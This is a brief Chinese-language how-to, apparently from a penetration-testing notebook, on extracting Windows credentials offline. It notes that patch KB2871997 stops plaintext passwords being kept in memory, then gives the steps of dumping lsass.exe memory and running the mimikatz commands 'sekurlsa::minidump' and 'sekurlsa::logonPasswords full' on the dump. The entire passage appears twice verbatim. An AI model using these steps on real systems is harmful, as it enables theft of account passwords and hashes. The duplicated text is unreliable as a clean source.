mimikatz离线抓明文
0x00:list
微软在win7之后就打了补丁kb2871997,通过禁用Wdigest Auth来强制系统内存不保存明文口令,所以打了补丁的机器(版本较新的windows系统应该是自带的)都无法直接导出明文口令。
转储lsass.exe的内存文件
本地使用mimikatz读取dmp文件
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
微软在win7之后就打了补丁kb2871997,通过禁用Wdigest Auth来强制系统内存不保存明文口令,所以打了补丁的机器(版本较新的windows系统应该是自带的)都无法直接导出明文口令。
转储lsass.exe的内存文件
本地使用mimikatz读取dmp文件
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full